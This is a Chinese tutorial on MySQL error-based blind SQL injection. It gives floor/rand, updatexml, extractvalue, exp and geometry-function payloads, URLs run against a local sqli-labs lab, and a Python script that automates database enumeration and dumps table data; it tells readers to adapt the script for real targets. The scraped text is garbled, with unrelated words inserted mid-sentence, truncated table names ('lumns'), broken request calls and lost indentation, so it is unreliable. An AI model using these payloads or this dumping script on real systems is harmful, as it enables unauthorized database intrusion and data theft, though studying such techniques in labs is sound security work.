sql盲注之报错注⼊(附⾃动化脚本)作者:__LSA__ 0x00 概述
渗透的时候总会⾸先测试注⼊,sql注⼊可以说是web漏洞界的Boss了,稳居owasp第⼀位,普通的直接回显数据的注⼊现在⼏乎绝迹了,绝⼤多数都是盲注了,此⽂是盲注系列的第⼀篇,介绍盲注中的报错注⼊。
0×01 报错注⼊原理
其实报错注⼊有很多种,本⽂主要介绍⼏种常见的报错⽅法,有新姿势后续再更新。
1. Duplicate entry报错:
⼀句话概括就是多次查询插⼊重复键值导致count报错从⽽在报错信息中带⼊了敏感信息。 关键是查询时会建⽴临时表存储数据,不存在键值就插⼊,group by使插⼊前rand()会再执⾏⼀次,存在就直接值加1,下⾯以rand(0)简述原理: ⾸先看看接下来会⽤到的⼏个函数
Count()计算总数
Concat()连接字符串
Floor()向下取整数
Rand()产⽣0~1的随机数
rand(0)序列是011011
1. 查询第⼀条记录,rand(0)得键值0不存在临时表,执⾏插⼊,此时rand(0)再执⾏,得1,于是插⼊了1。
2. 查询第⼆条记录,rand(0)得1,键值1存在临时表,则值加1得2。
3. 查询第三条记录,rand(0)得0,键值0不存在临时表,执⾏插⼊,rand(0)再次执⾏,得键值1,1存在于临时表,由于键值必须唯⼀,导致报错。
由上述可得,表中必须存在⼤于等于3条记录才会产⽣报错,实测也如此。
假设字段数是3
经典语句:
union select 1,count(*),concat(version(),floor(rand(0)*2))x from lumns group by x;–+
version()可以替换为需要查询的信息。
简化语句:
union select 1,2,count(*) from lumns group by concat(version(),floor(rand(0)*2));–+
如果关键的表被禁⽤了,可以使⽤这种形式
select count(*) from (select 1 union select null union select !1) group by concat(version(),floor(rand(0)*2))
如果rand被禁⽤了可以使⽤⽤户变量来报错
select min(@a:=1) from information_schema.tables group by concat(password,@a:=(@a+1)%2)
Sqli-labs less5测试:
手机报网站
1. 获取库名:
192.168.43.173:8999/sqli-labs/less-5/?id=1' Union select 1,count(*),concat(database(),0x26,floor(rand(0)*2))x from lumns group by x;--+
2.获取表名:
192.168.43.173:8999/sqli-labs/less-5/?id=1' Union select 1,count(*),concat((select table_name from information_schema.tables where
table_schema='security' limit 3,1),0x26,floor(rand(0)*2))x from lumns group by x;--+
3. 获取列名:
192.168.43.173:8999/sqli-labs/less-5/?id=1' Union select 1,count(*),concat((select column_name from lumns where
table_schema='security' and table_name='users' limit 1,1),0x26,floor(rand(0)*2))x from lumns group by x;--+
4. 爆数据:
192.168.43.173:8999/sqli-labs/less-5/?id=1' Union select 1,count(*),concat((select password from users limit 0,1),0x26,floor(rand(0)*2))x from lumns group by x;--+
2. Xpath报错:
四维瓷业主要的两个函数:
Mysql5.1.5
1. updatexml():对xml进⾏查询和修改
2. extractvalue():对xml进⾏查询和修改
都是最⼤爆32位。
and updatexml(1,concat(0×26,(version()),0×26),1);
and (extractvalue(1,concat(0×26,(version()),0×26)));
Sqli-lab less5测试:
Updatexml():
192.168.43.173:8999/sqli-labs/less-5/?id=1′ and updatexml(1,concat(0×26,database(),0×26),1);–+
Extractvalue():
192.168.43.173:8999/sqli-labs/less-5/?id=1′ and extractvalue(1,concat(0×26,database(),0×26));–+
3. 整形溢出报错:
Mysql>5.5.5
主要函数:
exp(x):计算e的x次⽅
Payload: and (EXP(~(select * from(select version())a)));
Exp()超过710会产⽣溢出。
将0按位取反就会返回“18446744073709551615”,⽽函数执⾏成功会返回0,所以将成功执⾏的函数取反就会得到最⼤的⽆符号BIGINT值,从⽽造成报错。
4. 数据重复报错:
Mysql低版本
payload:select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x
5. 其余报错:
GeometryCollection()
id = 1 AND GeometryCollection((select * from (select * from(select user())a)b))
polygon()
id =1 AND polygon((select * from(select * from(select user())a)b))
multipoint()
周文麟
id = 1 AND multipoint((select * from(select * from(select user())a)b))
multilinestring()
id = 1 AND multilinestring((select * from(select * from(select user())a)b))
linestring()
id = 1 AND LINESTRING((select * from(select * from(select user())a)b))
multipolygon()
id =1 AND multipolygon((select * from(select * from(select user())a)b))
0×02 报错注⼊脚本
依据sqli-lab less-5写的⾃动化注⼊脚本,实战再根据具体情况修改即可,盲注还是写脚本⽅便点。
(建议在linux下使⽤,win下的cmd⽆法使⽤termcolor,win下可注释并修改print即可,有颜⾊还是挺酷的!)
#coding:utf-8
#Author:LSA
#Author:LSA
#Description:blind sqli error base script
#Date:20171222
import sys
import requests
年降雨量import re
import binascii
from termcolor import *
import optparse
fdata = []
def judge_columns_num(url):
for i in range(1,100):
columns_num_url = url + '\'' + 'order by ' + str(i) + '--+'
rsp = (columns_num_url)
rsp_content_length = rsp.headers['content-length']
if i==1:
rsp_true_content_length = rsp_content_length
continue
if rsp_content_length == rsp_true_content_length:
continue
else:
print (colored('column nums is ' + str(i-1),"green",attrs=["bold"]))
columns_num = i
break
def getDatabases(url):四面墙内
dbs_url = url + "' union select 1,count(*),concat((select count(distinct+table_schema) from information_schema.tables),0x26,floor(rand(0)*2))x from information_schema.tables group by x;--+"
dbs_html = (dbs_url).content
dbs_num = int(re.search(r'\'(\d*?)&',dbs_html).group(1))
print "databases num:" + colored(dbs_num,"green",attrs=["bold"])
dbs = []
print ("dbs name: ")
for dbIndex in xrange(0,dbs_num):
db_name_url = url + "' union select 1,count(*),concat((select distinct table_schema from information_schema.tables limit
%d,1),0x26,floor(rand(0)*2))x from lumns group by x;--+" % dbIndex
db_html = (db_name_url).content
db_name = re.search(r'\'(.*?)&', db_html).group(1)
dbs.append(db_name)
print (colored("\t%s" % db_name,"green",attrs=["bold"]))
def getTables(url, db_name):
#db_name_hex = "0x" + binascii.b2a_hex(db_name)
tables_num_url = url + "' union select 1,count(*),concat((select count(table_name) from information_schema.tables where
table_schema='%s'),0x26,floor(rand(0)*2))x from lumns group by x;--+" % db_name
tables_html = (tables_num_url).content
tables_num = int(re.search(r'\'(\d*?)&',tables_html).group(1))
print ("databases %s,tables num: %d" % (db_name, tables_num))
print ("tables name: ")
for tableIndex in xrange(0,tables_num):
table_name_url = url + "'union select 1,count(*),concat((select table_name from information_schema.tables where table_schema='%s' limit
%d,1),0x26,floor(rand(0)*2))x from lumns group by x;--+" % (db_name, tableIndex)
芽孢杆菌table_html = (table_name_url).content
table_name = re.search(r'\'(.*?)&',table_html).group(1)
print (colored("\t%s" % table_name,"green",attrs=["bold"]))
def getColumns(url,db_name,table_name):
#db_name_hex = "0x" + binascii.b2a_hex(db_name)
#table_name_hex = "0x" + binascii.b2a_hex(table_name)
dataColumns_num_url = url + "' union select 1,count(*),concat((select count(column_name) from lumns where table_schema='%s' and table_name='%s' ),0x26,floor(rand(0)*2))x from lumns group by x;--+" % (db_name,table_name) dataColumns_html = (dataColumns_num_url).content
dataColumns_num = int(re.search(r'\'(\d*?)&',dataColumns_html).group(1))
print ("table: %s,dataColumns num: %d" % (table_name, dataColumns_num))
print ("DataColumns name:")
for dataColumnIndex in xrange(0,dataColumns_num):
dataColumn_name_url = url + "' union select 1,count(*),concat((select column_name from lumns where table_schema='%s' and table_name='%s' limit %d,1),0x26,floor(rand(0)*2))x from lumns group by x;--+" %
(db_name,table_name,dataColumnIndex)
dataColumn_html = (dataColumn_name_url).content
dataColumn_name = re.search(r'\'(.*?)&',dataColumn_html).group(1)
print (colored("\t\t%s" % dataColumn_name,"green",attrs=["bold"]))
def dumpData(url,db_name,table_name,inputColumns_name):
#db_name_hex = "0x" + binascii.b2a_hex(db_name)
#table_name_hex = "0x" + binascii.b2a_hex(table_name)
dataColumns_num_url = url + "' union select 1,count(*),concat((select count(*) from %s.%s),0x26,floor(rand(0)*2))x from
lumns group by x;--+" % (db_name,table_name)
data_html = (dataColumns_num_url).content
datas = int(re.search(r'\'(\d*?)&',data_html).group(1))
inputColumns = inputColumns_name.split(',')
print (colored("Total datas: " + str(datas),"green",attrs=["bold"]))
print str(inputColumns_name) + ":"
for inputColumnIndex in xrange(0,len(inputColumns)):
for dataIndex in xrange(0,datas):
dataColumn_name_url = url + "' union select 1,count(*),concat((select %s from %s.%s limit %d,1),0x26,floor(rand(0)*2))x from lumns group by x;--+" % (inputColumns[in
putColumnIndex],db_name,table_name,dataIndex)
data_html = (dataColumn_name_url).content
data = re.search(r'\'(.*?)&',data_html).group(1)
fdata.append(data)
print (colored("\t%s" % data,"green",attrs=["bold"]))
for inputc in range(0,len(inputColumns)):
print str(inputColumns[inputc]) + "\t",
print ""
print "+++++++++++++++++++++++++++++++++++++++++++++++++"
n = len(fdata) / len(inputColumns)
for t in range(0,n):
for d in range(t,len(fdata),n):
print colored(fdata[d],"green",attrs=["bold"]) + "\t",
print ""
print "+++++++++++++++++++++++++++++++++++++++++++++++++"
豫公网安备41160202000603
站长QQ:729038198
关于我们
投诉建议